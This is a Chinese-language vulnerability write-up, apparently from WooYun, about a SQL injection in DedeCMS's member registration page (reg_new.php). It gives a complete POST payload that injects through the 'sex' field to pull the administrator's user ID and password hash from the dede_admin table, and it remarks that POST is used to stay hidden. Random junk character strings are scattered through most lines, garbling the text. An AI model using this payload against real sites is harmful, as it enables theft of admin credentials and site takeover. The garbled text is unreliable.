漏洞类型: SQL注射漏洞, P G) q/ r% F7 E+ c/ U1 N
简要描述:
; g' N8 D6 J# K1 i& E# [
( Q+ L7 M3 T7 A0 X) S" M6 P) Y需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.1 e) N& A! r3 R8 v4 _
原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.8 b# D' D+ b; b8 D/ O( m2 @
详细说明:跟这个漏洞
7 K2 j B! H3 ~+ W- S
: Q. V5 s5 K6 G$ |( M# i8 X$ q! ?WooYun: Dedecms SQL注射导致审核机制绕过漏洞
' ?9 o4 l( d9 ^6 r' ?% N/ @, f0 V6 q是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.
7 j) U% C) ^7 G; c @. TPOST提交以下数据,其实不用POST提交的,这样隐蔽点.3 J3 j4 b2 x" I9 a7 D
7 K N2 O v' `% W: S' ?
www.political-security.com/member/reg_new.php4 N8 @- S8 k. H0 r: g" O. K2 Y x5 y
, P# a7 C4 s8 d9 k3 b( |" R& f
POST
* w5 b' Q0 H/ B# H$ d* [& \ $ P5 X3 i" [5 F+ E: U. L
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&
: O7 L* Y: e/ q# Auserid=c4rp3nt3r&uname=c4rp3nt3r
4 J* X* y# L6 V/ L$ h&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss& u7 q1 c0 ^' ^$ p
&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,
7 M, n8 G3 b; |(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');
: m; G7 _7 _; B* ]8 s8 F% z8 A%00&vdcode=glos&agree= |